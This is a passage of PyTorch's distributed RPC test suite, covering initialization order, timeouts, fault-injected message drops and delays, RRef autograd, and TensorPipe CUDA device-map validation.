dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
# Wait for all init to complete.
dist.barrier()
# Ensure rpc initialization works again.
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Verify RPCs work after re-init.
dst = worker_name((self.rank + 1) % self.world_size)
rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
rpc.rpc_sync(dst, foo_add, args=())
rpc.shutdown()
def test_wrong_types(self):
with self.assertRaisesRegex(
TypeError,
"Argument backend must be a member of BackendType",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend="TENSORPIPE",
)
with self.assertRaisesRegex(
TypeError,
"Argument rpc_backend_options must be an instance of RpcBackendOptions",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=self.rpc_backend,
rpc_backend_options={"init_method": self.init_method}
)
def test_cannot_infer_backend_from_options(self):
# An exception should be raised if the backend isn't specified but
# options are given which are not an instance of any of the known
# agents' option classes.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
@dist_init
def test_owner_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(10, 10, requires_grad=True)
rref = rpc.RRef(t1.sum() + t1.sum())
rref.backward()
expected_grad = torch.ones_like(t1) * 2
self.assertEqual(expected_grad, t1.grad)
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id)
self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
# Double backward.
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
# Test errors.
with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
rpc.RRef(torch.rand(10)).backward()
with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
rpc.RRef(torch.rand(10, requires_grad=True)).backward()
with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rpc.RRef("foo").backward()
@staticmethod
def _sum(x):
return x.sum()
@staticmethod
def _identity(x):
return x
@dist_init
def test_user_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t = torch.rand(10, requires_grad=True)
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._sum, args=(t,))
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rref.backward(context_id)
with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
rref.backward()
@dist_init(setup_rpc=False)
def test_shutdown_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
if self.rank != 0:
og_func = rpc.api._broadcast_to_followers
og_rref_func = rpc.api._delete_all_user_and_unforked_owner_rrefs
# Monkey-patch _broadcast_to_followers to fail, which would ensure
# _all_gather on leader raises an exception.
def raise_error(sequence_id, objects_map):
og_func(sequence_id, objects_map)
raise RuntimeError('simulation')
# Monkey-patch _delete_all_user_and_unforked_owner_rrefs to fail,
# which would ensure barrier is not called on followers.
def rref_error():
raise RuntimeError('simulation rref')
try:
rpc.api._broadcast_to_followers = raise_error
rpc.api._delete_all_user_and_unforked_owner_rrefs = rref_error
with self.assertRaisesRegex(RuntimeError, 'simulation rref'):
rpc.shutdown()
finally:
rpc.api._broadcast_to_followers = og_func
rpc.api._delete_all_user_and_unforked_owner_rrefs = og_rref_func
else:
with self.assertRaisesRegex(RuntimeError, 'timed out in _all_gather'):
rpc.shutdown()
dist.barrier()
class CudaRpcTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(2)
@dist_init
def test_profiler_remote_cuda(self):
if self.rank != 1:
return
dst_cuda_0 = (self.rank + 1) % self.world_size
dst_cuda_1 = (self.rank + 2) % self.world_size
dst_worker_cuda_0 = worker_name(dst_cuda_0)
dst_worker_cuda_1 = worker_name(dst_cuda_1)
with _profile(use_cuda=True) as p:
fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
fut1.wait()
fut2.wait()
def get_name(event):
return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
function_events = p.function_events
for event in function_events:
if event.is_async:
self.assertEqual(0, event.cuda_time_total)
self.assertEqual([], event.kernels)
self.assertEqual(0, event.cuda_time)
else:
if event.node_id == 1:
continue
self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
if get_name(event) in EXPECTED_REMOTE_EVENTS:
self.assertGreater(event.cuda_time_total, 0)
self.assertEqual(1, len(event.kernels))
kernel = event.kernels[0]
if event.node_id == dst_cuda_0:
self.assertEqual(kernel.device, 0)
if event.node_id == dst_cuda_1:
self.assertEqual(kernel.device, 1)
self.assertGreater(event.cuda_time, 0)
# Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
# events.
remote_events = [event for event in function_events if event.is_remote]
remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
class FaultyAgentRpcTest(RpcAgentTestFixture):
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init(messages_to_delay={})
def test_check_failed_messages(self):
if self.rank == 0:
dst_worker_b = worker_name((self.rank + 1) % self.world_size)
dst_worker_c = worker_name((self.rank + 2) % self.world_size)
# Worker0 sends RPC to Worker1 and creates an RRef there
rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
# Worker0 sends an RPC to Worker2 with the RRef as an arg
rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
# check if the output is as expected
self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
# explicitly delete all User RRefs
_delete_all_user_and_unforked_owner_rrefs()
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
self.assertEqual(
set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
set(self.rpc_backend_options.messages_to_fail),
)
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
if self.rank != 0:
return
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Attempt to fork the RRef should raise an error indicating the rpc.remote timeout.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref._serialize()
# Test that using RRef as arg over RPC (which forks) results in the same
# error
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# test the case where rpc.remote() message creation is completely dropped.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, func, args=args)
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
# on the owning nodes, this is expected because the OwnerRRef was never
# successfully created. Therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# Test the case where remote message is eventually processed on the owner,
# but the future on the creator times out before the response comes back.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
        # 1 ms timeout
rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# to_here() should now pick up that rpc.remote() creation has failed.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Test the case where rpc.remote() times out, but to_here() has already
# started blocking before.
        # NOTE: we only test this when not sending to self, as to_here()
        # calls localValue(), which does not send an RPC and thus does not have
# a timeout. This can be supported by allowing future.wait() to
# take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
if dst_rank != self.rank:
slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
with self.assertRaisesRegex(RuntimeError, expected_error):
# to_here() should raise timeout error, since it does not know about the
# status of rpc.remote().
slow_rref.to_here(0.001)
# Note: If we proceed with shutdown, UserRRef will send out a RRefUserDelete
# but this can be a noop since it may not exist on the owner yet. Later,
# the owner can process the RRef creation and wait for the delete message,
# thus leading to a timeout.
# Therefore, we wait until we get notification that pending owners have
# been confirmed before sending out RRefUserDeletes.
if dst_rank != self.rank:
wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
func = my_sleep_func
args = (1,)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref.to_here(0.01)
rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
# PYTHON_CALL message types which correspond to Python UDF over RPC
# by default get a delay (see faulty_rpc_agent_test_fixture)
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(
dst_worker,
torch.add,
args=(torch.tensor(1), torch.tensor(1)),
timeout=1,
)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# TensorPipeRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.init_method
)
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
@dist_init
def _test_rref_get_type_timeout(self, blocking):
# Test where we try to get the type of a RRef from an owner, but RRef
# creation is slower than timeout passed into _get_type.
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.5
expected_err = self.get_timeout_error_regex()
# Blocking: blocks on inline call
if blocking:
with self.assertRaisesRegex(RuntimeError, expected_err):
slow_rref._get_type(timeout=timeout, blocking=blocking)
# Non-blocking: blocks on wait
else:
fut = slow_rref._get_type(timeout=timeout, blocking=blocking)
with self.assertRaisesRegex(RuntimeError, expected_err):
fut.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
def test_rref_get_type_timeout_blocking(self):
self._test_rref_get_type_timeout(blocking=True)
def test_rref_get_type_timeout_non_blocking(self):
self._test_rref_get_type_timeout(blocking=False)
@dist_init
def test_op_with_invalid_args(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Overloaded torch operator invoked from Python failed to many any schema"
):
rpc.rpc_sync(dst, torch.add, args=())
def _test_rref_proxy_timeout(self, rref_proxy_api):
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), ))
# Ensure RRef is created on remote node.
rref.to_here()
rref_api = getattr(rref, rref_proxy_api)
self.assertTrue(rref_api is not None, f"Failed to get RRef proxy api: {rref_proxy_api}")
expected_error = self.get_timeout_error_regex()
timeout = 2
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_slow_method(torch.ones(2, 2))
if rref_api == rref.rpc_async:
result.wait()
elif rref_api == rref.remote:
result._get_future().wait()
# Case where rpc.remote() is stuck and exceeds timeout
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.01
rref_api = getattr(slow_rref, rref_proxy_api)
# Note that even when we call rref.rpc_async() in this case, we
# time out in future creation, not waiting for future. This is because
# rref proxy function calls rref._get_type before returning future,
# which blocks on the RRef being created on owner node, until the
# specified timeout.
with self.assertRaisesRegex(RuntimeError, expected_error):
rref_api(timeout=timeout).my_instance_method(torch.ones(2, 2))
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
@dist_init
def test_rref_proxy_timeout(self):
for rpc_api in ["rpc_sync", "rpc_async", "remote"]:
self._test_rref_proxy_timeout(rpc_api)
class MyConvNetForMNIST(nn.Module):
def __init__(self, device):
super().__init__()
self.net = nn.Sequential(
nn.Conv2d(1, 16, 3, 1),
nn.ReLU(),
nn.Conv2d(16, 32, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Flatten(1),
nn.Linear(4608, 128),
nn.ReLU(),
nn.Linear(128, 10),
).to(device)
self.device = device
def forward(self, x, is_rref=False):
x = x.to_here() if is_rref else x
with torch.cuda.stream(torch.cuda.current_stream(self.device)):
# intentionally adding delay to current CUDA stream
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
return self.net(x)
def __getstate__(self):
# return an empty dict to avoid inspecting the model contents on the
# owner
return {}
class TensorPipeAgentCudaRpcTest(RpcAgentTestFixture):
def _test_device_maps(self, options, errMsg):
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(
options,
errMsg="Node worker0 has invalid target node names in its device maps"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(
options,
errMsg="Node worker0 has source devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(
options,
errMsg="Node worker0 has target devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(
options,
errMsg="Node worker0 has duplicated target devices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
@staticmethod
def _gpu_add_given_devices(x, y, x_to, y_to, z_to):
x_device = "cpu" if x.device.type == "cpu" else x.device.index
y_device = "cpu" if y.device.type == "cpu" else y.device.index
if x_device == x_to and y_device == y_to:
return x.to(z_to) + y.to(z_to)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_gpu(self, x_from, y_from, z_to, device_map, dst=None, fn=None):
fn = TensorPipeAgentCudaRpcTest._gpu_add_given_devices if fn is None else fn
x_to = device_map[x_from]
y_to = device_map[y_from]
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size) if dst is None else dst
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(x_from)
y = torch.ones(2).to(y_from)
ret = rpc.rpc_sync(dst, fn, args=(x, y, x_to, y_to, z_to))
reverse_device_map = {device_map[k] : k for k in device_map}
z_from = reverse_device_map[z_to]
ret_device = "cpu" if ret.device.type == "cpu" else ret.device.index
self.assertEqual(ret_device, z_from)
self.assertEqual(ret, torch.ones(2).to(z_from))
rpc.shutdown()
def test_device_map_cpu(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to="cpu",
device_map={"cpu" : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_cpu_to_gpu_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=0,
device_map={"cpu" : 0},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_cpu_to_gpu_non_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=1,
device_map={"cpu" : 1},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
